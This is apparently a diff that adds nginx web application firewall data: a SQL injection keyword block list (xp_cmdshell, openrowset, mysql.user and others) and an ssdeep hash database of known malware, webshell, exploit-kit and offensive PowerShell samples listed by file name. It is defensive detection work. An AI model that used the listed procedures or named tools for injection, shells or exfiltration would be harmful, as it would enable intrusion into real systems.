+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF   
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS   
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN   
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)   
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF   
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+attnotnull
+attrelid
+atttypid
+autonomous_transaction
+dbms_java
+'dbo'
+information_schema.tables
+mb_users
+'msdasql'
+msysaces
+msyscolumns
+msysobjects
+msysqueries
+msysrelationships
+mysql.user
+nvarchar
+openquery
+openrowset
+pg_attribute
+pg_class
+sm3na_authors
+sp_addextendedproc
+sp_execute
+sp_executesql
+@@spid
+sp_makewebtask
+sp_oacreate
+sp_password
+sp_prepare
+sp_sqlexec
+sql_longvarchar
+'sqloledb'
+sql_variant
+sys.all_tables
+syscolumns
+sysdatabases
+sysobjects
+sys.user_catalog
+sys.user_constraints
+sys.user_objects
+sys.user_tab_columns
+sys.user_tables
+sys.user_triggers
+sys.user_views
+sysxlogins
+tbcreator
+user_ind_columns
+user_objects
+user_tables
+user_users
+utl_file
+utl_http
+varchar
+@@version
+xp_availablemedia
+xp_cmdshell
+xp_dirtree
+xp_enumdsn
+xp_execresultset
+xp_filelist
+xp_loginconfig
+xp_makecab
+xp_ntsec
+xp_regaddmultistring
+xp_regdeletekey
+xp_regdeletevalue
+xp_regenumkeys
+xp_regenumvalues
+xp_regread
+xp_regremovemultistring
+xp_regwrite
+xp_terminate
+tbladmins
+@@VERSION--
+dns.sqli.
+db.collection.find
diff --git a/nginx-waf/ssdeep-database.txt b/nginx-waf/ssdeep-database.txt
new file mode 100644
index 0000000..466e80a
--- /dev/null
+++ b/nginx-waf/ssdeep-database.txt
@@ -0,0 +1,7719 @@
+ssdeep,1.1--blocksize:hash:hash,filename
+98304:tJ5HddzxnXfi+Ve9l2zbfVWpru26NqMG1eYalIsbDJHW3AlvZuF:tJ5HzxXK+VeuzbfsrpsbDJHWauF,"directory-list-1.0.txt"
+98304:TB5RTN9jY+SB/+h4Mfw1wmSLJyWZ7QCwfCxHbqeNnlGrg0zEhv+n6sMF1R8KzLR3:PRTN91K+hummMjZ7QCECxOEPXha6sMFx,"coar.icy"
+98304:rlekk5ELUNVpdiGuxWXAvJCUqX7Ekltrx57:rAk0FLpdi5xWXA0tLEklpx57,"KINS_Dec2011.zip"
+98304:mYinWs36gaIPVMlttHe3wyLjPBO76a6P0W1jjTwGBn3MU1X1FfSg5PB6WNMSvPbJ:DiWA6vl7He8+z0W1HkG2U1DfP556WzbJ,"ExploitKit.Sava.zip"
+98304:gzmaQ5LDNhLbQYnNLmK6K3u2EFSSKkOKx8upqI14t3L1E308fKw/kNsyM:iK53XbQYnNaK61pKkOKx8u4I14t3pyU6,"EngRat.0.1.0.zip"
+98304:CqoYVwa/1MZi7SiABDNQ6sZDU+aOG5hMKB7BHTgHBDIJM3zaBLhhDJy4LPsHJaSY:Cqo+waV7Si6xQ6QtM/BJc0LlLsHJB6N,"Dendroid.zip"
+98304:3XUfpjGenX46QOmQyMmeP5kZ6dN+ODa5HETg7aEs:3XwlGuIImRePBjc5HpaEs,"Rovnix.zip"
+96:zYMGx+QTsFcOuFA/WP9gUtVwHhkqD6fx28pppl8yUAF8rRxXzmUUWesKDA9hAVXg:cMGx+9HuFGCmhR8Xpl8sSqUzlKDA3V,"bt.php.159"
+96:ZWzr0oBb8qq3vbFvCS+OUENuv41yCutcOWQSzumO0lWc4lxFK40lyx4SQ940lA4O:QQ3vbFR/uv41/bkIIxI+vDr5CM,"Get-MicrophoneAudio.ps1"
+96:ZIFalBYQ5FHdH+dYmERDt2+hCENgX1jU9WHRCwQ4Ir/lTG0/uIHvFU2VauTaSN+c:ZIFmjU7WDo+gENgFA9MUBG0/ucvqj4Ec,"2016-08-24-EITest-flash-redirect-from-onogini.xyz.swf~"
+96:Ze7pm7Gjk4DZqKoJsPyCVhjaDujCxQDqn1+0LlEsy1myxutJ5m8alg6rSMuOIE+G:mCa95aQC+C9REsDyxuojgHs+a9eY,"bt.php.6"
+96:z7oqmabKdwB0Od+4F70TDFZKEG3c1HLTajvkMjESiaWvEIAGXyom6:YQenOedZKhS2fESiDvR9Xb,"sep16-3.txt"
+96:z1Yx2/aRMajeWo5SMLtx7UOh9m2az4dD6dYqpw4GWCPHMXYoG+cY7:zA2/nWonLtx7UOh9Rs4gdYqpw4GWCPH2,"Enable-DuplicateToken.ps1"
+96:YxAhQzlIgYm87MgbGmNviwSIzDq5h/ir4:YxeEZkZuw7Oh44,"使用说明.txt"
+96:yV1N7W6c8K3O5V3+Y4pOdB4+Tp/rq0rPyXtEagm:u1ZpjK+6Y4pOTJIAKEaV,"2016-02-22-js-from-compromised-website-skinnymom.com-zlrecipe_print.js.txt"
+96:YUffjFt0Ra3biRiQXkqfDckCAsbgqJAggJ5ggJiggJ7T57/WeE6SrDcCSB7TkSTE:YUfppLWc8yUT2tWZ3rA/1T9PRu9,"g.txt"
+96:yPuQlnLDgeBDSDlyJ2VIV3GeIl9irth/oa6H82w4M5Ch3cP9XbfGKiijUzLk:yHt/xkuPBU9iToaV2X6CBcPBfGKi9Lk,"antak.aspx"
+96:YPJj5kqPJznp3zHcDzX3mM5g7FR2dsXd5kYdvI60nIeKIHgHwArgAp:YPJhpp3zHcXmM5lsNfI6iIeJAQArgAp,"oracle.jsp"
+96:yMYmZ0SAWFUWehV/ks97roAyO+F5nPuIuuUELNQhxLmtwhZB9rIqTCv2GRZ0LLRj:3KSAwuzP75yxFMIuuUELNQzKfqTCdwN,"fuckphpshell-Shell-Commander.php"
+96:/ymOr0upldk7k7+7C7lG8P6raPduM4gK7:/yms0Gldk7k7+7C788SWPYDP,"amasty.biz.js"
+96:ylVNfPuIRJR2/jsXOsReZbjys19n8ZB1L:yd3ejyKt8ZB1L,"Out-HTA.ps1"
+96:YjKIEQbsrYS7U1rd/iGj7l+KA+3lYeEouXKcrUfsMzkE8ezFQNw2Cdb7EhJ/3:nlj0vim9N3yj7wfziVwF7Ez,"McN-Executed-Command-cmd-obf.php"
+96:YH+7hoh4VxznhgSfJaDzBQ2MFiSQyQHQpdwdKdO+xa41uwdWSokXk0omQE9WQ5XW:YH+ZzhgSRazMFzmIO+xLu+TUcwgk,"oracle_jsp脱裤.jsp"
+96:YbhXLliogLbokYLzPR+iF4gwtDqmr38RyymZxTfUXFG8AOnxYwQ/2wLaSArtKwsb:YbhXLl+WfL4pN8QBfCREwQPaIb,"bt.php.32"
+96:Y8vKGJ379g6VBZnCK2I4E88p1tPz32HkTCztwJHvH3zJGFOC09oMsulm2kHRJ4:RDCm4V0/PbVTStwNvDJGKTsom2B,"backupsql_by_Cow_v2.0.php.txt"
+96:y7YA8NwSFofa8yLKbhfCbmb0Z0vu0K/S19M:yBSFonyLih6bm4avhr4,"laudanum.php"
+96:y7uQ5nLDgeBDSDlyJ2VIV3GeIl9irth/oa6H82w4M5Ch3cP9XbfGKiijUzLk:yLR/xkuPBU9iToaV2X6CBcPBfGKi9Lk,"国外牛逼大马.aspx"
+96:Y7lL2xsPrIoXOvZXsGs2nDKhCcu7ZZUshFbnMC/v5B9Vdpv+Ikfb0MtxgyP4+cuO:Y71WO/O,"2016-05-26-pseudoDarkleech-Angler-EK-CryptXXX-decrypt-instructions.html"
+96:Y2OpGd+bavfSDFgxiGBTt3TMaRuLANrKAAzLovom6OuyccrC9b:Tqbav6axi03TMaAyKAAQvz6Oec2b,"pbot.txt"
+96:XzL8OfuBqVmQzmKc+H2OTy9giOU+tU3QWXvIgoi4+dzi2SyUwUqY3qdi8NULqb:38Of9V/zNjTy9RiwQmvtJqv378/,"tunnel.php"
+96:XXVLAVYpEGhYgQ1skBi4vFf9st0luAFGhfHu88jn2EDak392Xnk:1aYpfhYg/kgjmlqhPty2xK9+k,"VirusShare_113420dadb71c2e142659fe12a9f5703"
+96:xxkI7fN9FD/ybQRCrWxGQMXyz6qlnSAQ84ESNyDU++RKT+84duUFJ:xxkIh9FD/ybQwrWBMXyJlnSk3SeX+f8e,"2016-07-13-EITest-flash-redirect-from-hemmox.xyz.swf"
+96:xIpmRmD0D3dtXeFz2bowLHPwLl5muLAoLqELf1L1c8L83vnNne17hle5IYU+:xIg06NtXeFz+JSLH3F1Ngvnxe17hlnY,"BillingInformation.html"
+96:xHHMoGeJXYZKsNB6QokdzZfbCBWWhk+prWsDiN4PI0umATx3SnNt2T/PHfdU8oM:dsoGSoZKsNB694+3hk+NWMQJl3SnNt2v,"2016-04-05-malspam-example-03.eml"
+96:xg88/sRgznTECw6K0JYKVtRWzNS19WP43ok5K401s:xgp0+n9JYuQzN+9z3km,"chap2asleap.py"
+96:XCyAdZ6+JW6ZMc42cMQFzExWw1MVsoGs2l/27ov8n6FNGYXROTKHXc6NoY8ZETxY:06+YiMc4j1ex9VbUoYYXROTKbNoFZoxY,"04b5039a2d0f430b10572df0e35933f2_php.txt"
+96:xCQsJ8JJqJHJH/aLuWQmTKdwo6l5ZgqSK6lr0fLIV/JOgddo4fnt1JTMw34swvVc:JoYgpH/aBahaLSKorpykXH,"cutia.txt.1"
+96:xc3vRrjjfaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaqjgZoaJCdFj521V117J17p0:6ZraaaaaaaaaaaaaaaaaaaaaaaaaaaaA,"nonoseed0121.asp.txt"
+96:x5nbMoG3JXYTfHd6h+oeIyix2yQYYNkvRtxA3zMHiw6GM0AMWFOx:x5nAoG5oTfHGfeIyi8kvtQMCwflx,"2016-04-05-malspam-example-04.eml"
+96:x1yp538e9j+AOhOF7cIecLanc2LiSDWmbWDWZeVbQKRETow7Vu:x0dYk1ecUMXq8,"Get-Information.ps1"
+96:WZ6RhvLmc4Qlfl6oKuDG8wpZkrN3u37Ax/ZjmER3ylNi0:WERp36oZDGhper88xVR3O,"finance_NiOmcc.js"
+96:Wyxq7gU6ePx/7q/CDDUA4P5GePreP2/2/zNr58+QAa9786N:Wyo75PMKXCPPSPX/zL8+K786N,"2016-08-24-EITest-Rig-EK-landing-page.txt"
+96:WWxTMopaVQWjANU/O7qpQDUJIT/+jP//+jPi/RYa6Nrmia9Wk1qP:WWRJExcq3pihqPGPWYpEvWk1m,"2016-08-17-EITest-Rig-EK-landing-page.txt"
+96:wWo5ADvDYQM+OPwk+Xoc1ksUphsnnHnXwXiR6kzLMWYFQv:LmyDkJAoc1ks+ynHnhXzoV6,"report_guDZOe.js"
+96:WW8W4+AuKhXNoXyhC+AqCnb0bOdeSUnUCyWmN5HGOujyJXYtO+wyrn8ZWCioCz:WW8W4+lXyhC+meZDC5HZvo8+b78YZ,"conn.aspx"
+96:WW8W4+AuKhXNoXyhC+AqCnb0bOdeSUnUCyWmN5HGOAb:WW8W4+lXyhC+meZDC5HZU,"conn.aspx"
+96:WvHjHa0eCX1WXgzitk/XLRJFJyVqeuKlDONA9ksVAavfif5SK2TFIn:W/jHaVClWWeAXLvzcfK2q,"mal-jun3-5.txt"
+96:WrxjnMb6jFWLkI4tFmW31qjdXhY5dXhY5TdhlAhjqKgv1a9bN+pl:WrJndFWLkI4vBFqDY5vY5TNCqKgv6bNk,"2016-08-16-pseudoDarkleech-Rig-EK-landing-page-after-blenheim-lodge.com.txt"
+96:WRAm5PwsDNRRP5xrFrtlNwdcU7Cr7UV/Pr+3U6edeiV:WRwsp7P5hZlBUVKk6g,"bb7.php"
+96:WhxQ6M56lXIY5rENW/tI/TQedbXPmUlXIY5rEEIhbYR0wM7qtw8sDU0g+Ya9Wswd:Whe6p4YSUYcyPmC4YSEI1jQtP+vlBWsA,"2016-08-18-EITest-Rig-EK-landing-page.txt"
+96:Wdxi4N96GIYdP/f5QTCXz3PtGIYdc0NrB3qIM1a9ehP7l:WdBUYdOODPLYdlr3q36ehDl,"2016-08-22-EITest-Rig-EK-landing-page-after-best-remit.com.txt"
+96:wCSRStRQWZRPuRXJUrTei/ZdeDOUeyAkop6YJkabnHiAR45lv8YtIt2DaRt2t2U:lSY9cwY+JkabnHiAkUWaQ,"Add-ScrnSaveBackdoor.ps1"
+96:WcBOdS1UhD0lbVh/iIL/xNgSaoyU/oTasQJJuBKEuabDZFYi+xU6M8:W+OdS1Uilbz/TLp/cLTDQ/yuabDZYM8,"bt.php.190"
+96:WAvExdG/T/nGgQulVrIWLXulCQGEfd69mAMFYpvmRvH3:WAMYJlVrIqXjQGm69mAMFYyvX,"channel.py"
+96:W1Yg2/aRMajeWo5SMLtx7UOh9m2az4dD6dYqpw4GWCPHMXYoG+cY7:WP2/nWonLtx7UOh9Rs4gdYqpw4GWCPH2,"Enable-DuplicateToken.ps1"
+96:VuZ2cvUpRN0F2neQ85puyQZt1YVuV6KfV0Vy5T0:ofANruhA1YEa2T0,"Get-HttpStatus.ps1"
+96:VtFEM5yQBvA+MpjuXJwbk2M8/imGBXBCzEZDE:XFscPMc2c86Rxw,"albums-thumbnails.php"
+96:VrO1RcjJuTA28WviqMfFASCXcg5iD6hAy0:ZQnRFviqMfFASCXcg5Ksm,"wsb.pl"
+96:VQYrcVOw9xgVy/hEX9Dc8O96FgKR51qLutwLHHb7IloMiTQd8UxhpgDY7qiWytCD:HcVOwUW/dhLH7MltcOhpeyqivEZAM,"4.php"
+96:VPYq+xEo81Vy+E89D+PR6DESRASdLutEL29pT3ZjA28VIhWgSYHqF31tuv7NtWW8:J+xTCPEY1L295paGhWlaqFn+Vi,"6.php"
+96:vM0BVFjvwW/d94vSY0JvefaaGcaDHCcZMm4iN9KF4DoXdbC4rsMehj1dD:vLwW/d9Ur0JvizLabCaM3iN9M4cXTrl8,"17511870-8655h-302618.js"
+96:Vl+y2sq86nMwZRn7rV2/jgRQtWjKHiJHNr2tg5BdYrNjB4iHYr3x:6y2sq86njXV2rgQtW2HixNCtgXdYrNn6,"matamu.txt"
+96:Vl+y2sq86nMwZRn7rV2/jgRQtWjKHiJHNr2tg5BdYrNjB4iHYr37WIlIXv:6y2sq86njXV2rgQtW2HixNCtgXdYrNnX,"matamu.txt.001"
+96:vIPzp0XoU11XhQwk6wtkwrFdAyLqSEBgLS7OgRC20ncmn:uudQZ6dTyLqSEhCtncmn,"tmp51F8.tmpps1"
+96:vIPjt0XoU11X4wkfw8wSTTuyLRSpQO97CgRA/20nCmn:uakZfvYyLRSpvA/tnCmn,"tmpCB2C.tmpps1"
+96:vIPIXoU11XPwkxwhwzTRkvyLUYSIJjC7ERUSuP20nQmn:uILZxmITR+yLUYSIfUS6tnQmn,"tmp15F3.tmpps1"
+96:VGy7MoGMJXY5givnE9H9Fnt+t1NiscwvBxyHSKvI+z8B1O:UygoG0o5gWnEvFnotSs5UnvIC8vO,"2016-04-05-malspam-example-01.eml"
+96:VfuWMoG5JXYDLPxBrwnrsp4U4OrerpT3NRXo7GHgqFpOXBv:VioGXoDLwrZ02pzNRYyH/pOXBv,"2016-04-05-malspam-example-05.eml"
+96:VBCm0d/M8tXJrJCRYHI9gGn9421dig22mSeEfmzYYqQuLml/vXYEQXyT7rX:AtZdCyH494u2j5,"INNa1d0-na1d0-spammer.php"
+96:V+B+112kJCjcgF6ERLFs96dotZ2WqKaVAGP5vDKHPECWUvZXDiJ6DWKWCVnOBm9P:Vsu12kJCj/UWzOZurAEvDK8CWUv5DiYV,"Do-Exfiltration.ps1"
+96:VaRu8TQjOSivvG+7aarBmdKzh79lcUBIuxGUo/VAK4NoLO0WxhzRmPiyjKeWOLnm:VajUOrG+pcdKOUrDFKXnYzKi2rrX/sGm,"bt.php.234"
+96:vAbXx2u3S/m0H+4JSJr6i89ARq1Eoh4BOrwSMzAs:vAbD8Hb6r619Aey,"top.txt"
+96:vAbXx2u3S/m0H+4JSJr6i89ARC1Eoh4BOrwSMzAs:vAbD8Hb6r619AKy,"top.1"
+96:v5KZntgdye9b7pe9b7ue9b7MPe9b7ue9b7rrkThGPHlgyxqZV0/GJGuD2ue4gLta:v5KZWdx9Q9h9b9J97kThGmyxqZV0/GJV,"Port-Scan.ps1"
+96:v57QRSRmfPZfqV7/JGiRPsatsnJkFsj717b35J74u:vhQYYfPZ6/JXVCJIE7L554u,"meter_rev_tcp.cpp"
+96:uZ4i6sc4OnsdQ9C/+Ci+6jJfpdyIov3g7d7xQwKbBy:uZ1E44skC/+CipJfp0Fv3g7d7xQwKb0,"Out-Minidump.ps1"
+96:uyyIAUkLDXmbyPbXqpOdB4+TpAr2PSwTDEW7za:uyyIAUkL74yT6pOTJFSwTDEwe,"wp-embed.min.js.txt"
+96:UY8Ot2Dfn9yW2L9BvJH4RFUs9APmN5cLPMN3:UYW0rBp4RukEm0LkJ,"2016-08-05-EITest-flash-redirect-from-ebumusud.top.swf"
+96:UX0fRqk1FGCk1YnDHnKpbxdBbjX09lbcv492E06vCy0:UEf8k1F7k1uDHYhU5cvAh0sCy0,"Gupt-Backdoor.ps1"
+96:Uty7OOtkwtlW/vTxsJ60aW/v9os1wkdraj1vXZn7cJdWYp:UI1TtZJ5a0oqwOExShp,"ansitowin32.py"
+96:UtV14Hhq4hmJ+sRIbVzbfTC1b8bvPBAb5P6Vk7fktEKV1:Ur1eFUwNTWe1,"winterm.py"
+96:UtJqHQ60LvOEzL3a0XUeuBxkQ76BJA4C5MT9AeTgsJLAHArhND3VJLAHGVrA:U7cQ9m2fA47BAeTbZAHArhND3VZAHGVs,"win32.py"
+96:UKOgwthtDFWxyESs5UkUTM66P6tRWIlIXn:UzrAyESs5UkWM66yrWIlIXn,"ftpsearch.txt"
+96:uH94lepVediFs7ezOybul8INliOi68LWYhe:O9cY8iT5qLYM,"mailer-uploader-ipays.php"
+96:u+gkvonkmh9vUqEDIJoaoan6zPuQn6zPZTb37DU5r5I5rAfqU5vSMH:uzkQSjaxoan6zPuQn6zPZc5r5I5sfb5h,"Invoke-PowerShellUdp.ps1"
+96:UEqarzDgk5W7X0VBoaKR0LzD+LosJ/tg3M9c0uBkRnSMUo:UEXrzEk5W7240LP+Lng8huBkoo,"cutescan.py"
+96:u4NTAK4fQMkLGVtzlVK6yON1KnAFvr1goyZUXo1VBUtQ1DzY67bQK/Omj7xDCL6V:u4NMK4HoGVBKroYAFT1noBUtQBz12WCQ,"2016-08-17-EITest-flash-redirect-from-kydiris.xyz.swf"
+96:U1UMia9fbpDBOtTnQR0MvMRoMmM3MWMcyeSdmLlj/KRSLRDsoqS4aVV5G6iQi1tj:U3jJBOtTnQRxkR1Lc7cyeSdSljiQRDsB,"Brute-Force.ps1"
+96:TZ05vrhrsC2DofIqIY+7IPKEChotNRaHtI:TZcrhAC2cILnho9aq,"sad.txt"
+96:TWpg2Wai5B0S0FykcvuqAyCse7QobMTID/A++9qq2gzxwhNb/PXQuFzjt5UD3m:Tzj5BMokAuqAyeM0D/i9vFYIkXYm,"bt.php.171"
+96:TWg+GMuSg1ufqo7t2xXCxNHzMsvehKvjkfwd6FZ5sGI/W:TdZSgWaXIRzMsveh0oou55I/W,"document_rCDXCI.js"
+96:tRrnkpBNnkntGdiaigVAMll7dh4FPBePP+:XkfFytxaUehZ+,"aaaaaaaaaaaa.xml~2"
+96:t+nkpXZnkntGdiaigVAMll7dh4FPaePP+:qkpJytxaUehq+,"aaaaaaaaaaaa.xml~3"
+96:TMRSdujDs/a6IDDqj5higbAHZWyj5cVdvIw6fovSKN:yk/e2jWDlcCfob,"exceptions.py"
+96:tKd5Dgyej8HHHHHAyuASzzvVF7cF2VJnJfD25eb/ktwcXeLR9aRjuEDnK0hl7KsN:Ylej8HHHHHPulDjJfIeqS9ag4,"mailer-spam-Coun73r-id.php"
+96:thnkp8inkntGdiaigVAMll7dh4FPTePX+:TkHytxaUehz+,"aaaaaaaaaaaa.xml~"
+96:tFnkpn40nkntGdiaigVAMll7dh4FPQePX+:vkXytxaUehY+,"aaaaaaaaaaaa.xml"
+96:tDXSs6KvRnf/WwZnGkLToYbkeUzpu1vFOA4MFZRkwgVv7H84Ow:tD5BNf/tWYbWzslUsFZRk5NH84Ow,"transaction_yoReNp.js"
+96:t8nRibEpws+nkntGki3igVA9ll7dhFFP/C+:ERpncytw3UrhC+,"SYSSCOOBYDOOPC35.xml"
+96:t2iFsZG5DL63MS2D9VFDJNH02I4JSJ2uVeJ/sYqCZ6zrF9eRG1EWhVdRD5x8:t2iFlN6o1Y2x62uehyl9eia,"m.txt"
+96:t1ypXJ8e9j+AOhOF7cIecLanc2LiSDWmbWDWZeVbQKRETow7Vu:t0pYk1ecUMXq8,"Get-Information.ps1"
+96:SzmyAutYa3ypnReQ8Sjbwi0G/9w5wOqEGiwm6dPgHkweS/NEROiIkCHgtCYJXNm:SiBJDzwiR9tOqEKRqeSY4v,"啊D小工具 - 目录读写检测 [ASP版].asp"
+96:SyGWE9DpfbNBWF7Lcx6B4QMom118bxji3YUR70bLrbPMCv:p/EDpTNBQ7LE6BKowIxe39Ro7bP,"cat.jar"
+96:syfVo06SdlVIeehD7wggF/ZZmqJczUcz0nHwpP3UOsd:syfVHueehzqJczUcz0Hq/yd,"rip-cvs.pl"
+96:sXwy/ZS4TRsqhecEjPjeQi02jkWr8c63TMdbJi7aF3rlNkd/krTY1Y1:sXwy/ZS41sqheVPnWd5oubx5wkrU1Y1,"2016-07-25-pseudoDarkleech-CryptXXX-decrypt-instructions.HTML"
+96:sXQyjF+iccmGubXlXBWQ20zh3PBgCKen3w8waZK/5dV9Mx:sXQyHJmG+TFdPA15dTMx,"2016-07-11-Afraidgate-CryptXXX-decrypt-instructions.HTML"
+96:sXn1yu5CxTH8b2DPMymNo2L87a24ulXhCfKZbjcbTyTGV4R:sX1yVVH8wLpBVlRUyTO4R,"2016-07-08-EITest-CryptXXX-decrypt-instructions.HTML"
+96:sXjy3PvOHv9FFQm0tbhW2IqJWuqNy3YAzMJw53l5HuVzMl5LJKV:sXjyfcvn4rFBWMlJJKV,"2016-07-15-pseudoDarkleech-CryptXXX-decrypt-instructions.HTML"
+96:sXiy31sbWJNxr+w2qT5fdHVk6IK9FWSmSPIyvbXpXQd:sXiylsbQnTLVumbXdQd,"2016-07-19-EITest-CryptXXX-decrypt-instructions.HTML"
+96:sXHzyhxxiF6K73EPs6yA23bsriuo3vU/sl2ZsRbrsbLKz5XQAwJ:sXHzy1KAjNBbukKzvwJ,"2016-07-19-pseudoDarkleech-CryptXXX-decrypt-instructions.HTML"
+96:sx9grZ2Pu8wtyhpuPMA5peFBeTIC+dtk/h3GbniCC8NvRvGSUxqmdWVJlkSXQdgj:s/wiuZIk8/Uatk5Me8VxCxFdGQMqC,"pBot-gif89a-header-obf.php"
+96:SX7f1Y4lstGFfs8uXMWNDol2AOj1a0Bv3xsn63bbcQ3SLs846d7N7p56G:SLp6tGIdi2hKGBSwl6d7NqG,"info.php"
+96:sX5yAZfcaOMkbyz3R7EDGkQ9u1YpmKNvSz5gijLzdqzSxITzC3SB7+wdJ56iqIMj:sX5yhDTSb138b+Yl7aRoJ,"2016-07-18-pseudoDarkleech-CryptXXX-decrypt-instructions.HTML"
+96:Sx2DcvvkxlmEOFStp+Vg5lm0cBt6OTsJv2++:Y2Dcvvkuktp+Vg5lm0AIJv2++,"ec.txt???"
+96:sWIhAppckxJo+jaliTHC7mAsgG8F6XpOdB4+Tp/rq0rPyXtEE+e8:7IhOpckVaE0BsjGKpOTJIAKEE+e8,"2016-02-22-js-from-compromised-website-skinnymom.com-edd-checkout-global.min.js.txt"
+96:sva92oE8SluwmYY9/1SyAeeuwL9L358okCvT5qznjpPn/LrSLpTo/IUjfMY:si92J8Bwmz9/1SyZeuCdem8znjpPn/Mu,"2016.txt.002"
+96:srHvQX+XH8XFkS7AK/LussGERj0YRpjl2wZj3j8auwdAHwBPRP/:nOM1kSWGERHRpM+j3IKAQTX,"customize.ashx"
+96:s+rbXHvonUsYqwLZvUqVn/0b37DMo6XBr4qIVCqiMH:syb3QCK+lo6XBEfVCqig,"Invoke-PowerShellTcp.ps1"
+96:sPpn/wVq2AMw3XGMrknalh+jznph3EnY7dOTJVnlV52Z2kKAj+KOx2YvDJbSgIER:y2tKjrkjzTUdVnYYJAtsGm,"bt.php.210"
+96:SnXZKPPYdSBUq8TIWmGzNaNVGugWyLpHQmC/OZsS51iZi/AN+bl7+z+G5SuafBsW:SncYdSBdvG8/qLZZpwZBYh6iOSuatTMM,"bt.php.23"
+96:SJHl5j8xE7qI4RSS+BXmIKK3RbaWHuDHLcuEKdStOK3uwFuZR4ken:YlqGq+S04KhbaWYjK4yn,"Cat.java"
+96:SI3nnQf9IPeiuV0bSZqlZpWubqmmLn6VDsJ2YV1VEaCh7r7pP:SI3aN2NbS0aCh7vN,"2016-04-21-page-from-doc-italia.com-with-injected-script.txt"
+96:SHU/mKF3W2kouD+mJT1XTBosqsss08UeBPQ9:KId3W2xuD+Cd4iPU,"eva.php"
+96:SfUKuOHi+wPQHiqTnw1HiU8OYKHivK/FZYgMFkRDlLfKKAaiWOtCF28Zkd:SfUvOHi+8QHiyn+HilOYKHivwFygMFki,"asp_kit_uploader_by_unknown.asp.txt"
+96:SAziDnuRF1AmWG3N6QyeoL3N0NWWogyW4sI:SAziDuRDYGqLs4sI,"test.php"
+96:SaIOUDdwOgJmakld+K4UzHw03xMUhulQA:S4UDdwOgmaWd+MzQQZAN,"Invoke-Encode.ps1"
+96:S5Wrdyg6zUA+pV3shkl+nFzovx1z3LgSLgtchCo6ycAVHQwfYr3hH6YXz:S9zUA+zjPvXEcf6sVHTfEhHXXz,"W3D-SQL-Shell.php"
+96:S0uujE68AL3PFy9Y59wDI80J6a0tMO6l/ydcqc1i8a:7TEWzPKY59bytMOEqaNc,"gif89a.asp"
+96:RXyEiky8GiwBEyGvhYrN59aIRMZDfjFWdqjFWKNyPEu3vtva9mTyu:YEfyEpPYrN5ibjFWQjFWK4ntAmTyu,"2016-06-02-Rig-EK-landing-page-after-doc-italia.com.txt"
+96:RXyEiky8GiwBEyGNuhYisj9aITJDZMflkFWMb5NuhYisR9aITJDZDa9mTyu:YEfyEpH6YzjXlCmFWA6YzRXl0mTyu,"2016-06-02-Rig-EK-landing-page-after-pavtube.com.txt"
+96:RXyEiky8GiwBEyG6pRS9aILZZuqj8qGFWRcxZihYKhGY/NKG2ha9mTyu:YEfyEpwutnR4FWRcKYKPKG2WmTyu,"2016-06-01-Rig-EK-landing-page.txt"
+96:RXSuRFwxMUFWrNyPpTJPndKC+9UpFW2MhYjNx9aIzsunZ2m2Da9mLnx:lRF8FWr41KC+9EFWBYjNxiuZ2m20mbx,"2016-04-21-Rig-EK-landing-page.txt"
+96:RXSHEiky8GiwBEyG/zJFWjhNyPO9aIlZr/zJFWjUksfG6DARa9mWyw:qEfyEpfFWjh42VpFWjYzAmmWyw,"2016-05-17-Rig-EK-landing-page.txt"
+96:RXOEiky8GiwBEyGJip+9aI0IZN2jiFW12+EphYJLPrXC2ha9mxyu:UEfyEpA+eyN2+FWU3YJHXC2Wmxyu,"2016-05-27-Rig-EK-landing-page-first-run.txt"
+96:RXOEiky8GiwBEyGh3GWS19aIUpZMjtQ5FWQE/hYgxVcos2ha9mxyu:UEfyEpX81cM0FWD5YgIos2Wmxyu,"2016-05-27-Rig-EK-landing-page-second-run.txt"
+96:RXOEiky8GiwBEyGfxxj9aIqb4ZpefzHKFWeNyP+RdgyjLPa9mxyu:UEfyEp15wHKFWe4WR2Pmxyu,"2016-05-25-Rig-EK-landing-page-first-run.txt"
+96:RXOEiky8GiwBEyGCwhY4V9aILLZTCwhY4VCwhY4H9aILLZY2ha9mxyu:UEfyEpHY4Vx9xY4vY4Hx9Y2Wmxyu,"2016-05-26-Rig-EK-landing-page.txt"
+96:RWzBWBPCPEFJFwOYCg3hp6MTMrQ+0OFQLwT+iRkvFf7IinBQ4Bq:RWz8pgEFrqhEUGXSfFnC4M,"sql3_udf.sqlext"
+96:Rwrf8RhDtoAK5YAHNb/5qcUWO/ceBNJRHJCQXba/6V9rn:RHtoAzAHp6,"network.js"
+96:rUtCwM2CVz8TH8AP4W2XzlkYgI8BlSO6DWcDJOpz94xu4CG:rMCwM2Cxy2XzleLSDDWYJOpz9ED,"test_terminal.py"
+96:RueAPSeOeE1GLqG1Iud1a+fCaXMDef8Whn1HhesTkB3/eGOsegOk9uzISvNbmXK8:RueAPcGBeSasNX3fvhnBoCkJQHLFCXK8,"cp.php.zip"
+96:rTwYUNQLKskpNEF2C6KO7xYMSQwYmJSJDpFgdu5KkP:rcY9LPMNEFfsnmyDpFcu5x,"test_file_check.py"
+96:RTsGUmWyQYN4dNMxNNFZ3pEIychFmOGHl4:R4mWyxiPMbZZh0xF4,"up.jsp"
+96:rRB4pP0vWmGjoqOs4UZPuE9gl+R5jEgpXjEnV/8:rRB4l0vWNjoqOs4UBdCE,"test_net_curl.py"
+96:rQtFrA84xYSIat9nM3nFaQb+T41wHq++4OMD4J4eo0aQ++T41wo0aQcWQv:rbxYrat9nenFaQb+T41wHq++4OMD4J4p,"smtp.recon1.phps"
+96:RQcOaWYZNKthILG/M/KrnDG36iAn/GrihPcnsIKGqZ9jPboUmRGWxzvG7xNpZP11:RKMQz+cbhbX9QQQAz5Bu5SArWm8okUIr,"iuhgfs.php"
+96:RnE+HdKPa5ciVVBcFIrvyBmazHaNG72LN/8RA3Xo8Au:9ECYOH/yFNga572LeApAu,"mempodipper.c"
